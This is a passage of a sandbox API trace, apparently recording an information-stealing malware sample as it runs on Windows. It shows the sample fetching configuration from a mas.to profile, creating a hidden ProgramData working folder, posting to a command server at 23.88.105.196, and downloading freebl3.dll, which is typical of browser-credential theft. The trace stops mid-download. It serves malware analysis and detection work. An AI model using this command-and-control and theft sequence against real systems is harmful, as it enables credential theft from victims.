(uFlags=0x40, uBytes=0x12) returned 0x7010f0 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6f0880 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f08c8 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f0808 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x701190 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6f07a8 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f0790 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f07c0 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f07d8 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f0850 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f08e0 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x7010d0 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6f0820 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x701290 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x7012d0 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x701310 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x700e50 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x700fd0 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f0838 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x701010 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x7019e8 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x700d90 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x700cd0 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x700f10 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x701988 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x43) returned 0x6d5490 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x42) returned 0x6d5580 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x3b) returned 0x6d3190 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x3a) returned 0x6d3070 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x701880 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x43) returned 0x6d53a0 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x42) returned 0x6d5260 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x3b) returned 0x6d31d8 [0084.219] LocalAlloc (uFlags=0x40, uBytes=0x3a) returned 0x6d2cc8 [0084.222] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x700ef0 [0084.222] LocalAlloc (uFlags=0x40, uBytes=0x43) returned 0x6d5670 [0084.222] LocalAlloc (uFlags=0x40, uBytes=0x42) returned 0x6d54e0 [0084.222] LocalAlloc (uFlags=0x40, uBytes=0x3b) returned 0x6d2f98 [0084.222] LocalAlloc (uFlags=0x40, uBytes=0x3a) returned 0x702a18 [0084.281] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x701850 [0084.281] LocalAlloc (uFlags=0x40, uBytes=0x43) returned 0x6d5080 [0084.286] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x74650000 [0084.286] GetProcAddress (hModule=0x74650000, lpProcName="LoadLibraryA") returned 0x74674bf0 [0084.286] GetProcAddress (hModule=0x74650000, lpProcName="GetProcAddress") returned 0x746678b0 [0084.286] LoadLibraryA (lpLibFileName="BCRYPT.DLL") returned 0x742c0000 [0084.489] LoadLibraryA (lpLibFileName="CRYPT32.DLL") returned 0x749d0000 [0085.126] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77820000 [0085.126] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x70830000 [0085.126] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x758f0000 [0085.126] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75160000 [0085.126] LoadLibraryA (lpLibFileName="user32.dll") returned 0x74790000 [0085.127] GetProcAddress (hModule=0x742c0000, lpProcName="BCryptCloseAlgorithmProvider") returned 0x742c3c50 [0085.127] GetProcAddress (hModule=0x742c0000, lpProcName="BCryptDestroyKey") returned 0x742c6420 [0085.127] GetProcAddress (hModule=0x742c0000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x742c3760 [0085.127] GetProcAddress (hModule=0x742c0000, lpProcName="BCryptSetProperty") returned 0x742c47e0 [0085.127] GetProcAddress (hModule=0x742c0000, lpProcName="BCryptGenerateSymmetricKey") returned 0x742c4910 [0085.128] GetProcAddress (hModule=0x742c0000, lpProcName="BCryptDecrypt") returned 0x742c4ff0 [0085.128] GetProcAddress (hModule=0x749d0000, lpProcName="CryptUnprotectData") returned 0x749f3140 [0085.128] GetProcAddress (hModule=0x749d0000, lpProcName="CryptStringToBinaryA") returned 0x749ed6d0 [0085.128] GetProcAddress (hModule=0x77820000, lpProcName="RegOpenKeyExA") returned 0x7783f790 [0085.128] GetProcAddress (hModule=0x77820000, lpProcName="RegQueryValueExA") returned 0x7783f500 [0085.129] GetProcAddress (hModule=0x77820000, lpProcName="RegCloseKey") returned 0x7783f620 [0085.129] GetProcAddress (hModule=0x77820000, lpProcName="RegOpenKeyExW") returned 0x7783f350 [0085.129] GetProcAddress (hModule=0x77820000, lpProcName="RegGetValueW") returned 0x77840670 [0085.129] GetProcAddress (hModule=0x77820000, lpProcName="RegEnumKeyExA") returned 0x77841810 [0085.129] GetProcAddress (hModule=0x77820000, lpProcName="RegGetValueA") returned 0x77841060 [0085.129] GetProcAddress (hModule=0x77820000, lpProcName="GetUserNameA") returned 0x77842910 [0085.130] GetProcAddress (hModule=0x77820000, lpProcName="GetCurrentHwProfileA") returned 0x77853a60 [0085.130] GetProcAddress (hModule=0x70830000, lpProcName="InternetCloseHandle") returned 0x708fd200 [0085.130] GetProcAddress (hModule=0x70830000, lpProcName="InternetReadFile") returned 0x708b7320 [0085.130] GetProcAddress (hModule=0x70830000, lpProcName="HttpSendRequestA") returned 0x708f8e60 [0085.130] GetProcAddress (hModule=0x70830000, lpProcName="HttpOpenRequestA") returned 0x70995860 [0085.130] GetProcAddress (hModule=0x70830000, lpProcName="InternetConnectA") returned 0x70970da0 [0085.131] GetProcAddress (hModule=0x70830000, lpProcName="InternetOpenA") returned 0x708f85d0 [0085.131] GetProcAddress (hModule=0x70830000, lpProcName="HttpAddRequestHeadersA") returned 0x708ac3f0 [0085.131] GetProcAddress (hModule=0x70830000, lpProcName="HttpQueryInfoA") returned 0x708d1880 [0085.131] GetProcAddress (hModule=0x70830000, lpProcName="InternetSetFilePointer") returned 0x709710c0 [0085.131] GetProcAddress (hModule=0x70830000, lpProcName="InternetOpenUrlA") returned 0x7087a6c0 [0085.131] GetProcAddress (hModule=0x70830000, lpProcName="InternetSetOptionA") returned 0x708d1dc0 [0085.131] GetProcAddress (hModule=0x758f0000, lpProcName="CreateCompatibleBitmap") returned 0x745a0830 [0085.132] GetProcAddress (hModule=0x758f0000, lpProcName="SelectObject") returned 0x75970440 [0085.132] GetProcAddress (hModule=0x758f0000, lpProcName="BitBlt") returned 0x745a09b0 [0085.132] GetProcAddress (hModule=0x758f0000, lpProcName="DeleteObject") returned 0x75970810 [0085.132] GetProcAddress (hModule=0x758f0000, lpProcName="CreateDCA") returned 0x745a1e00 [0085.132] GetProcAddress (hModule=0x758f0000, lpProcName="GetDeviceCaps") returned 0x745a0700 [0085.132] GetProcAddress (hModule=0x758f0000, lpProcName="CreateCompatibleDC") returned 0x745a0970 [0085.132] GetProcAddress (hModule=0x75160000, lpProcName="CoCreateInstance") returned 0x75530060 [0085.133] GetProcAddress (hModule=0x75160000, lpProcName="CoUninitialize") returned 0x755092a0 [0085.133] GetProcAddress (hModule=0x74790000, lpProcName="GetDesktopWindow") returned 0x747a3470 [0085.133] GetProcAddress (hModule=0x74790000, lpProcName="ReleaseDC") returned 0x7459a580 [0085.133] GetProcAddress (hModule=0x74790000, lpProcName="GetKeyboardLayoutList") returned 0x747c8e70 [0085.133] GetProcAddress (hModule=0x74790000, lpProcName="CharToOemA") returned 0x74812cf0 [0085.133] GetProcAddress (hModule=0x74790000, lpProcName="GetDC") returned 0x7459a680 [0085.133] GetProcAddress (hModule=0x74790000, lpProcName="wsprintfA") returned 0x747c04a0 [0085.133] GetProcAddress (hModule=0x74790000, lpProcName="EnumDisplayDevicesA") returned 0x745a1eb0 [0085.134] GetProcAddress (hModule=0x74790000, lpProcName="GetSystemMetrics") returned 0x747a9160 [0085.139] DeleteUrlCacheEntryA (lpszUrlName="mas.to") returned 0 [0096.001] DeleteUrlCacheEntryA (lpszUrlName="mas.to@killern0") returned 0 [0096.002] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0097.273] InternetConnectA (hInternet=0xcc0004, lpszServerName="mas.to", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x4800000, dwContext=0x0) returned 0xcc0008 [0097.274] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="@killern0", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x4800000, dwContext=0x0) returned 0xcc000c [0097.276] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0105.682] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19ee0c, dwNumberOfBytesToRead=0x7ff, lpdwNumberOfBytesRead=0x19edec | out: lpBuffer=0x19ee0c*, lpdwNumberOfBytesRead=0x19edec*=0x7ff) returned 1 [0105.683] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0105.695] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0105.695] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0105.726] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x800) returned 0x29a2758 [0105.748] GetLastError () returned 0x0 [0105.749] SetLastError (dwErrCode=0x0) [0105.749] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2758 | out: hHeap=0x29a0000) returned 1 [0105.753] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0fd0 [0105.753] Sleep (dwMilliseconds=0x64) [0106.030] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19f670 | out: lpSystemTimeAsFileTime=0x19f670*(dwLowDateTime=0x333b9d5a, dwHighDateTime=0x1d7b3bd)) [0106.042] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2) returned 0x29a1008 [0106.042] GetTickCount () returned 0x122e0f7 [0106.046] GetLastError () returned 0x0 [0106.046] SetLastError (dwErrCode=0x0) [0106.046] GetLastError () returned 0x0 [0106.046] SetLastError (dwErrCode=0x0) [0106.050] GetLastError () returned 0x0 [0106.050] SetLastError (dwErrCode=0x0) [0106.054] GetLastError () returned 0x0 [0106.054] SetLastError (dwErrCode=0x0) [0106.054] GetLastError () returned 0x0 [0106.054] SetLastError (dwErrCode=0x0) [0106.054] GetLastError () returned 0x0 [0106.054] SetLastError (dwErrCode=0x0) [0106.054] GetLastError () returned 0x0 [0106.054] SetLastError (dwErrCode=0x0) [0106.054] GetLastError () returned 0x0 [0106.054] SetLastError (dwErrCode=0x0) [0106.054] GetLastError () returned 0x0 [0106.054] SetLastError (dwErrCode=0x0) [0106.054] GetLastError () returned 0x0 [0106.055] SetLastError (dwErrCode=0x0) [0106.055] GetLastError () returned 0x0 [0106.055] SetLastError (dwErrCode=0x0) [0106.055] GetLastError () returned 0x0 [0106.055] SetLastError (dwErrCode=0x0) [0106.055] GetLastError () returned 0x0 [0106.055] SetLastError (dwErrCode=0x0) [0106.055] GetLastError () returned 0x0 [0106.055] SetLastError (dwErrCode=0x0) [0106.055] GetLastError () returned 0x0 [0106.055] SetLastError (dwErrCode=0x0) [0106.055] GetLastError () returned 0x0 [0106.055] SetLastError (dwErrCode=0x0) [0106.055] GetLastError () returned 0x0 [0106.056] SetLastError (dwErrCode=0x0) [0106.056] GetLastError () returned 0x0 [0106.056] SetLastError (dwErrCode=0x0) [0106.056] GetLastError () returned 0x0 [0106.056] SetLastError (dwErrCode=0x0) [0106.060] GetLastError () returned 0x0 [0106.060] SetLastError (dwErrCode=0x0) [0106.060] GetLastError () returned 0x0 [0106.060] SetLastError (dwErrCode=0x0) [0106.060] GetLastError () returned 0x0 [0106.060] SetLastError (dwErrCode=0x0) [0106.060] GetLastError () returned 0x0 [0106.060] SetLastError (dwErrCode=0x0) [0106.060] GetLastError () returned 0x0 [0106.060] SetLastError (dwErrCode=0x0) [0106.060] GetLastError () returned 0x0 [0106.061] SetLastError (dwErrCode=0x0) [0106.061] GetLastError () returned 0x0 [0106.061] SetLastError (dwErrCode=0x0) [0106.061] GetLastError () returned 0x0 [0106.061] SetLastError (dwErrCode=0x0) [0106.061] GetLastError () returned 0x0 [0106.061] SetLastError (dwErrCode=0x0) [0106.061] GetLastError () returned 0x0 [0106.061] SetLastError (dwErrCode=0x0) [0106.061] GetLastError () returned 0x0 [0106.061] SetLastError (dwErrCode=0x0) [0106.061] GetLastError () returned 0x0 [0106.061] SetLastError (dwErrCode=0x0) [0106.061] GetLastError () returned 0x0 [0106.061] SetLastError (dwErrCode=0x0) [0106.061] GetLastError () returned 0x0 [0106.061] SetLastError (dwErrCode=0x0) [0106.061] GetLastError () returned 0x0 [0106.061] SetLastError (dwErrCode=0x0) [0106.061] GetLastError () returned 0x0 [0106.061] SetLastError (dwErrCode=0x0) [0106.061] GetLastError () returned 0x0 [0106.061] SetLastError (dwErrCode=0x0) [0106.061] GetLastError () returned 0x0 [0106.062] SetLastError (dwErrCode=0x0) [0106.065] GetLastError () returned 0x0 [0106.066] SetLastError (dwErrCode=0x0) [0106.066] GetLastError () returned 0x0 [0106.066] SetLastError (dwErrCode=0x0) [0106.075] GetLastError () returned 0x0 [0106.075] SetLastError (dwErrCode=0x0) [0106.075] GetLastError () returned 0x0 [0106.075] SetLastError (dwErrCode=0x0) [0106.075] GetLastError () returned 0x0 [0106.075] SetLastError (dwErrCode=0x0) [0106.075] GetLastError () returned 0x0 [0106.075] SetLastError (dwErrCode=0x0) [0106.075] GetLastError () returned 0x0 [0106.075] SetLastError (dwErrCode=0x0) [0106.075] GetLastError () returned 0x0 [0106.075] SetLastError (dwErrCode=0x0) [0106.075] GetLastError () returned 0x0 [0106.075] SetLastError (dwErrCode=0x0) [0106.075] GetLastError () returned 0x0 [0106.075] SetLastError (dwErrCode=0x0) [0106.075] GetLastError () returned 0x0 [0106.076] SetLastError (dwErrCode=0x0) [0106.076] GetLastError () returned 0x0 [0106.076] SetLastError (dwErrCode=0x0) [0106.076] GetLastError () returned 0x0 [0106.076] SetLastError (dwErrCode=0x0) [0106.076] GetLastError () returned 0x0 [0106.076] SetLastError (dwErrCode=0x0) [0106.076] GetLastError () returned 0x0 [0106.076] SetLastError (dwErrCode=0x0) [0106.076] GetLastError () returned 0x0 [0106.076] SetLastError (dwErrCode=0x0) [0106.076] GetLastError () returned 0x0 [0106.076] SetLastError (dwErrCode=0x0) [0106.084] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1018 [0106.084] GetLastError () returned 0x0 [0106.084] SetLastError (dwErrCode=0x0) [0106.084] GetLastError () returned 0x0 [0106.084] SetLastError (dwErrCode=0x0) [0106.084] GetLastError () returned 0x0 [0106.084] SetLastError (dwErrCode=0x0) [0106.084] GetLastError () returned 0x0 [0106.084] SetLastError (dwErrCode=0x0) [0106.084] GetLastError () returned 0x0 [0106.084] SetLastError (dwErrCode=0x0) [0106.084] GetLastError () returned 0x0 [0106.084] SetLastError (dwErrCode=0x0) [0106.084] GetLastError () returned 0x0 [0106.084] SetLastError (dwErrCode=0x0) [0106.084] GetLastError () returned 0x0 [0106.084] SetLastError (dwErrCode=0x0) [0106.084] GetLastError () returned 0x0 [0106.084] SetLastError (dwErrCode=0x0) [0106.084] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0fd0 | out: hHeap=0x29a0000) returned 1 [0106.144] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0fd0 [0106.145] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1"), lpSecurityAttributes=0x0) returned 1 [0106.227] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1")) returned 1 [0106.228] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a1040 [0106.228] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files"), lpSecurityAttributes=0x0) returned 1 [0106.228] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0106.232] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x7a120) returned 0x3870048 [0106.242] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1040 [0106.248] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1068 [0106.248] GetLastError () returned 0x0 [0106.248] SetLastError (dwErrCode=0x0) [0106.267] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0106.267] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x19f538, dwBufferLength=0x4) returned 1 [0106.267] InternetConnectA (hInternet=0xcc0004, lpszServerName="23.88.105.196", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0106.267] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x41, lpBuffer=0x1, dwBufferLength=0x0) returned 0 [0106.268] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/1013", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0106.268] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a1090 [0106.268] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0106.269] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0106.269] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0106.269] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0106.269] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1090 | out: hHeap=0x29a0000) returned 1 [0106.269] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a1090 [0106.269] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x47) returned 0x29a10c8 [0106.269] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1090 | out: hHeap=0x29a0000) returned 1 [0106.269] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A", dwHeadersLength=0x3f, dwModifiers=0x20000000) returned 1 [0106.269] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Length: 25", dwHeadersLength=0x12, dwModifiers=0x20000000) returned 1 [0106.269] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x3870048*, dwOptionalLength=0x19) returned 1 [0106.471] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x2e, lpBuffer=0x19f5c8, lpdwBufferLength=0x19f534, lpdwIndex=0x0 | out: lpBuffer=0x19f5c8, lpdwBufferLength=0x19f534, lpdwIndex=0x0) returned 0 [0106.471] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x7800) returned 0x29a2758 [0106.471] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0106.471] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a2758, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f3b8 | out: lpBuffer=0x29a2758*, lpdwNumberOfBytesRead=0x19f3b8*=0xba) returned 1 [0106.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a2812, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f3b8 | out: lpBuffer=0x29a2812*, lpdwNumberOfBytesRead=0x19f3b8*=0x0) returned 1 [0106.472] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x1d, lpBuffer=0x19f400, lpdwBufferLength=0x19f3b8, lpdwIndex=0x0 | out: lpBuffer=0x19f400, lpdwBufferLength=0x19f3b8, lpdwIndex=0x0) returned 0 [0106.472] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0106.473] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10c8 | out: hHeap=0x29a0000) returned 1 [0106.473] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0106.473] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0106.473] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1068 | out: hHeap=0x29a0000) returned 1 [0106.473] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0106.473] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc0) returned 0x29a1040 [0106.473] GetLastError () returned 0x0 [0106.473] SetLastError (dwErrCode=0x0) [0106.473] GetLastError () returned 0x0 [0106.473] SetLastError (dwErrCode=0x0) [0106.473] GetLastError () returned 0x0 [0106.473] SetLastError (dwErrCode=0x0) [0106.473] GetLastError () returned 0x0 [0106.473] SetLastError (dwErrCode=0x0) [0106.474] GetLastError () returned 0x0 [0106.474] SetLastError (dwErrCode=0x0) [0106.474] GetLastError () returned 0x0 [0106.474] SetLastError (dwErrCode=0x0) [0106.474] GetLastError () returned 0x0 [0106.474] SetLastError (dwErrCode=0x0) [0106.474] GetLastError () returned 0x0 [0106.474] SetLastError (dwErrCode=0x0) [0106.474] GetLastError () returned 0x0 [0106.474] SetLastError (dwErrCode=0x0) [0106.474] GetLastError () returned 0x0 [0106.474] SetLastError (dwErrCode=0x0) [0106.474] GetLastError () returned 0x0 [0106.474] SetLastError (dwErrCode=0x0) [0106.474] GetLastError () returned 0x0 [0106.474] SetLastError (dwErrCode=0x0) [0106.474] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xb0) returned 0x29a1108 [0106.474] GetLastError () returned 0x0 [0106.474] SetLastError (dwErrCode=0x0) [0106.474] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0106.474] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1040 [0106.474] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1068 [0106.474] GetLastError () returned 0x0 [0106.474] SetLastError (dwErrCode=0x0) [0106.475] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0106.475] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x19f684, dwBufferLength=0x4) returned 1 [0106.475] InternetConnectA (hInternet=0xcc0004, lpszServerName="23.88.105.196", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0106.475] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/freebl3.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0106.475] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a11c0 [0106.475] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0106.475] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0106.475] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0106.475] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0106.475] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0106.475] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0106.522] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.522] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a2758, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a2758*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.523] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a2b40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a2b40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.523] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a2f28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a2f28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.523] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a3310, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a3310*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.523] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a36f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a36f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.523] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a3ae0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a3ae0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.523] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a3ec8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a3ec8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.524] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a42b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a42b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.524] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a4698, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a4698*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.524] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a4a80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x29a4a80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.524] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29a4e68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: 